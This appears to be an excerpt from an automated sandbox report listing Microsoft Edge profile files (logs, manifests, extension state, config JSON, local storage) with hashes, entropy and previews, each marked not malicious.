Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	375520
Entropy (8bit):	5.354156943959234
Encrypted:	false
SSDEEP:	6144:gA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:gFdMyq49tEndBuHltBfdK5WNbsVEziPU
MD5:	5C7B9121F53746ABF3F3E85393661E45
SHA1:	60B6FB064A68F0409669D3A30B9BD72D6B822196
SHA-256:	11B8B719D02AAA30457EC85A94DE953F61003806E5903968709BF2E16A9DEE44
SHA-512:	8843BC9FD65673CDA9F4D544177AA51EC230AAE919C5D68F13DDCBC77F37D011BCD9507EC0B5B89B0DDA9CE3E5A6897240208E6048EA0BFC21332B0415043FF0
Malicious:	false
Preview:	...m.................DB_VERSION.1....q...............&QUERY_TIMESTAMP:domains_config_gz2...13375596811537534..QUERY:domains_config_gz2....[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	317
Entropy (8bit):	5.184920935345244
Encrypted:	false
SSDEEP:	6:HCnM1cNwi23oH+Tcwtk2WwnvB2KLlVCKyGLAQyq2PcNwi23oH+Tcwtk2WwnvIFUv:in2ZYebkxwnvFL6uLAVvLZYebkxwnQF2
MD5:	05C52888000D923E8DBCD46050DF6BB3
SHA1:	B0FCE75D4321E3207C246A594343177BB6865E5B
SHA-256:	6D6AF25BE3795A0A8BADB3AB4C01F85F9C1EE8CB84A32BAD132F9546C18CE46E
SHA-512:	4C8D4CD9E7413526B231245E0C3578678486B8D6265DE270DB3C1E4B81CB1D96770846B921118AC9735C410BD9212F7ABAE36C18812216FB01B77F29647A1976
Malicious:	false
Preview:	2024/11/08-22:33:28.767 20c4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/11/08-22:33:29.441 20c4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	358860
Entropy (8bit):	5.3246081964903444
Encrypted:	false
SSDEEP:	6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rz:C1gAg1zfv7
MD5:	0585FC253C208BFFB991F6A577BAADCD
SHA1:	0ACB290388E7FA23CC46F885046F9CEFCB447327
SHA-256:	1DADA038D1FF10ECC9A213E915E24DB75D59ACF4A8AD4E9238671662AC0F854C
SHA-512:	D4A69E2BDAC89081BEEEBFC0CA5DB9C3D7DC215281D997F9593B6F898AF55FCDA15774E1C34F12BDDB66BC0619BB2A949AD27C53856CDA04CB8466463B99FFC6
Malicious:	false
Preview:	{"aee_config":{"ar":{"price_regex":{"ae":"(((ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)))","dz":"(((dzd\|da\|\\x{062F}\\x{062C})\\s\\d{1,3})\|(\\d{1,3}\\s(dzd\|da\|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}\|egp)\\s\\d{1,3})\|(\\d{1,3}\\s(e\\x{00a3}\|egp)))","ma":"(((mad\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(mad\|dhs\|dh)))","sa":"((\\d{1,3}\\s(sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633}))\|((sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633})\\s\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})\|(\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})\|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})\|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	330
Entropy (8bit):	5.1699836614402
Encrypted:	false
SSDEEP:	6:HwdpOq2PcNwi23oH+Tcwt8aPrqIFUt8YwdIFbZmw+YwdFFkwOcNwi23oH+Tcwt8h:IEvLZYebL3FUt8NIFb/+Nr54ZYebQJ
MD5:	3D8420CA01515B46365AF9BA2D0E0018
SHA1:	7D1178117036DDCF90B09147443B679C2EC91201
SHA-256:	97A248C81FB65BEEDF43CA17C940A6A23103BD0C33B9DA1F37D0763D7DE15964
SHA-512:	A4FB076341B17C151684B8090A2005FC87B14CB4FBF73E9E30F4284705CEC7DE21B686B7EC8506B02E343680AF8EECEB244BB01B8D0BDE70093B7C8E0D78A339
Malicious:	false
Preview:	2024/11/08-20:47:23.813 1230 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/08-20:47:23.814 1230 Recovering log #3.2024/11/08-20:47:23.897 1230 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	330
Entropy (8bit):	5.1699836614402
Encrypted:	false
SSDEEP:	6:HwdpOq2PcNwi23oH+Tcwt8aPrqIFUt8YwdIFbZmw+YwdFFkwOcNwi23oH+Tcwt8h:IEvLZYebL3FUt8NIFb/+Nr54ZYebQJ
MD5:	3D8420CA01515B46365AF9BA2D0E0018
SHA1:	7D1178117036DDCF90B09147443B679C2EC91201
SHA-256:	97A248C81FB65BEEDF43CA17C940A6A23103BD0C33B9DA1F37D0763D7DE15964
SHA-512:	A4FB076341B17C151684B8090A2005FC87B14CB4FBF73E9E30F4284705CEC7DE21B686B7EC8506B02E343680AF8EECEB244BB01B8D0BDE70093B7C8E0D78A339
Malicious:	false
Preview:	2024/11/08-20:47:23.813 1230 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/08-20:47:23.814 1230 Recovering log #3.2024/11/08-20:47:23.897 1230 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.160427781066192
Encrypted:	false
SSDEEP:	6:Hwlq2PcNwi23oH+Tcwt865IFUt8YwdFbZmw+YwdFxkwOcNwi23oH+Tcwt86+ULJ:OvLZYeb/WFUt8N9/+NP54ZYeb/+SJ
MD5:	AF19A2CE713E664481752527298DEB6E
SHA1:	7268C0C4D5DEB3F40944414AF2EF34CB9A91898C
SHA-256:	A9E76BC10E9D6D91A35862038F78E4C70D186F085F6C2B554166D9861AE4B579
SHA-512:	2399F24E2724EB4582AC959BAB31FCA3067946CB333A7DA99183A9FA313EF17535D9168392CC2EBD914CBAD102D48702C8CD8F8E5768E629D812C7DFA00B8FF5
Malicious:	false
Preview:	2024/11/08-20:47:23.900 1230 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/08-20:47:23.901 1230 Recovering log #3.2024/11/08-20:47:23.901 1230 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.160427781066192
Encrypted:	false
SSDEEP:	6:Hwlq2PcNwi23oH+Tcwt865IFUt8YwdFbZmw+YwdFxkwOcNwi23oH+Tcwt86+ULJ:OvLZYeb/WFUt8N9/+NP54ZYeb/+SJ
MD5:	AF19A2CE713E664481752527298DEB6E
SHA1:	7268C0C4D5DEB3F40944414AF2EF34CB9A91898C
SHA-256:	A9E76BC10E9D6D91A35862038F78E4C70D186F085F6C2B554166D9861AE4B579
SHA-512:	2399F24E2724EB4582AC959BAB31FCA3067946CB333A7DA99183A9FA313EF17535D9168392CC2EBD914CBAD102D48702C8CD8F8E5768E629D812C7DFA00B8FF5
Malicious:	false
Preview:	2024/11/08-20:47:23.900 1230 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/08-20:47:23.901 1230 Recovering log #3.2024/11/08-20:47:23.901 1230 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
MD5:	826B4C0003ABB7604485322423C5212A
SHA1:	6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
SHA-256:	C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
SHA-512:	0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	330
Entropy (8bit):	5.172771786914254
Encrypted:	false
SSDEEP:	6:HtnAFRq2PcNwi23oH+Tcwt8NIFUt8YtniZmw+YtnOkwOcNwi23oH+Tcwt8+eLJ:NnAbvLZYebpFUt8Eni/+EnO54ZYebqJ
MD5:	72C7935C97E26833C7714D1ED6D04F2A
SHA1:	A229684A2F2AC9DD82A0CF0DB8E100ED1940C6EC
SHA-256:	5A018DBF79F12836A34271FB6AF131B721B0637C822424597E701B28DDDC7633
SHA-512:	DCA5CCB59033252A425AA3CAC8D354740204BF1CBB499A6FAF438D74A4634E85A094398574C440E2FCE7EB75412BAC40EF2F86579F8091054FD535D72C6934B4
Malicious:	false
Preview:	2024/11/08-20:47:24.625 1264 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/08-20:47:24.626 1264 Recovering log #3.2024/11/08-20:47:24.626 1264 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	330
Entropy (8bit):	5.172771786914254
Encrypted:	false
SSDEEP:	6:HtnAFRq2PcNwi23oH+Tcwt8NIFUt8YtniZmw+YtnOkwOcNwi23oH+Tcwt8+eLJ:NnAbvLZYebpFUt8Eni/+EnO54ZYebqJ
MD5:	72C7935C97E26833C7714D1ED6D04F2A
SHA1:	A229684A2F2AC9DD82A0CF0DB8E100ED1940C6EC
SHA-256:	5A018DBF79F12836A34271FB6AF131B721B0637C822424597E701B28DDDC7633
SHA-512:	DCA5CCB59033252A425AA3CAC8D354740204BF1CBB499A6FAF438D74A4634E85A094398574C440E2FCE7EB75412BAC40EF2F86579F8091054FD535D72C6934B4
Malicious:	false
Preview:	2024/11/08-20:47:24.625 1264 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/08-20:47:24.626 1264 Recovering log #3.2024/11/08-20:47:24.626 1264 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	429
Entropy (8bit):	5.809210454117189
Encrypted:	false
SSDEEP:	6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
MD5:	5D1D9020CCEFD76CA661902E0C229087
SHA1:	DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
SHA-256:	B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
SHA-512:	5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	0.21880421027789762
Encrypted:	false
SSDEEP:	3:ltFlljq7A/mhWJFuQ3yy7IOWUEIfludweytllrE9SFcTp4AGbNCV9RUIQF:e75fOmINud0Xi99pEY+
MD5:	E52568B63DC8ABBF134E0071662BF645
SHA1:	5BEC7D9C121B16B3CD2A01B806F08A0589F5437D
SHA-256:	2DC2F7A6DF58E45A6D64C8FD6A10C7A864DAA40B124A3477212AB4B162B49441
SHA-512:	5FD905E981C1E3536E7B13FECF5C2CBFA4BE34446552AC5A8A248020B35C0CE456CC839BA9C825160E57C35F61D36E93BC8F8361084FDB8E743FF083DCD58518
Malicious:	false
Preview:	.............-....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	3.6481101165292493
Encrypted:	false
SSDEEP:	384:aj9P0tbQkQerkjl5cbP/KbtZ773pL9hCgam6ItRKToaAu:adKe2ml+bP/o7Pv9RKcC
MD5:	FA8EC40ED9F61724A8AAE14F146E8ABC
SHA1:	92BF481BB99EAC8D312AD5998C0B5ADB98B1F827
SHA-256:	2B1B3E6FFBB45D7CC182AFAA2B1DB5E4F7CDF495EC7BAA258C9B2D34B1947497
SHA-512:	8980A828715627BEAECE18A272172C895DC7167A289F73B9664D855AF6A0F8EB3E8225C10F7A6AD5C5D5C5299F12806232C76CD4AC443142C803CEF6517154F8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	411
Entropy (8bit):	5.248967527440065
Encrypted:	false
SSDEEP:	12:uMVvLZYeb8rcHEZrELFUt8FMg/+F9I54ZYeb8rcHEZrEZSJ:uM5lYeb8nZrExg8FMH9SoYeb8nZrEZe
MD5:	FA6769C27F419B4DCB9708841744C6B7
SHA1:	04A8FD2ED5B66BE5F38B517BC621D727A67FF333
SHA-256:	F79187C0962ACDA2E78DB8C0A83BAA07D4A449190E974EFDBFEE16EC6C18E65B
SHA-512:	3EF9DC2E3C8ACFCFEA0B5D89F7A57E9581E61C96008403A02A10BA2D66D9EB0D88EF16243F18EDCFE6497B8642D3AD5F6EC6665A439F1690689B2189631DD21C
Malicious:	false
Preview:	2024/11/08-20:47:29.101 408 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/08-20:47:29.101 408 Recovering log #3.2024/11/08-20:47:29.102 408 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	411
Entropy (8bit):	5.248967527440065
Encrypted:	false
SSDEEP:	12:uMVvLZYeb8rcHEZrELFUt8FMg/+F9I54ZYeb8rcHEZrEZSJ:uM5lYeb8nZrExg8FMH9SoYeb8nZrEZe
MD5:	FA6769C27F419B4DCB9708841744C6B7
SHA1:	04A8FD2ED5B66BE5F38B517BC621D727A67FF333
SHA-256:	F79187C0962ACDA2E78DB8C0A83BAA07D4A449190E974EFDBFEE16EC6C18E65B
SHA-512:	3EF9DC2E3C8ACFCFEA0B5D89F7A57E9581E61C96008403A02A10BA2D66D9EB0D88EF16243F18EDCFE6497B8642D3AD5F6EC6665A439F1690689B2189631DD21C
Malicious:	false
Preview:	2024/11/08-20:47:29.101 408 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/08-20:47:29.101 408 Recovering log #3.2024/11/08-20:47:29.102 408 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1659
Entropy (8bit):	5.667182323383152
Encrypted:	false
SSDEEP:	48:QZOW1FHuvYVXZBerV03Sx4vyhXfC0fGHHHxda2LoEJ:QURvYhreT+RxLn
MD5:	DD0CDA7B2D34FD56F5A6A2F7301CB87C
SHA1:	48A869D413871D57A7030BC0405306AC2F80275A
SHA-256:	DCA1197A1D7C21860CC9324B5999483DD790BAB7907AD8FF013E7D68191C420D
SHA-512:	D5C05A18F8521DBA10ACCEFD3AEBE17218533F0017201E4CE6334B0016417DA3E1E903CF20AC694B7BAA335FACEC6216E2F2DF698F4B3CF6D056122772D59209
Malicious:	false
Preview:	.d..}................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult@.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":1340}.!_https://ntp.msn.com..LastKnownPV..1731116852359.-_https://ntp.msn.com..LastVisuallyReadyMarker..1731123213087.._https://ntp.msn.com..MUID!.1A1E8714CE116135161B9226CFE060A6.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1731116852470,"schedule":[22,-1,-1,-1,20,-1,37],"scheduleFixed":[22,-1,-1,-1,20,-1,37],"simpleSchedule":[36,12,29,37,41,35,43]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1731116852320.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241108.485"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_ht

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.189832056750109
Encrypted:	false
SSDEEP:	6:Htu+q2PcNwi23oH+Tcwt8a2jMGIFUt8YtkXZmw+YtpQdVkwOcNwi23oH+Tcwt8as:NfvLZYeb8EFUt8EkX/+Ec54ZYeb8bJ
MD5:	EB194F658AE912AE91F702ED841791E0
SHA1:	50CE9856711393F9A056EA2646E4BB248EEC8C56
SHA-256:	FC087EE3C94E9B1B5215C3D50FDD822B6E0BA530DA3A6EF6DF59C4DF1D558275
SHA-512:	179324B2F189C30505058BB4D4698887DD915FC94B002884B4398C16E487E9EEA0628D5F0AA71424F4BE0C7837503A729DB601787ACE3B65CE9F783B8BC02121
Malicious:	false
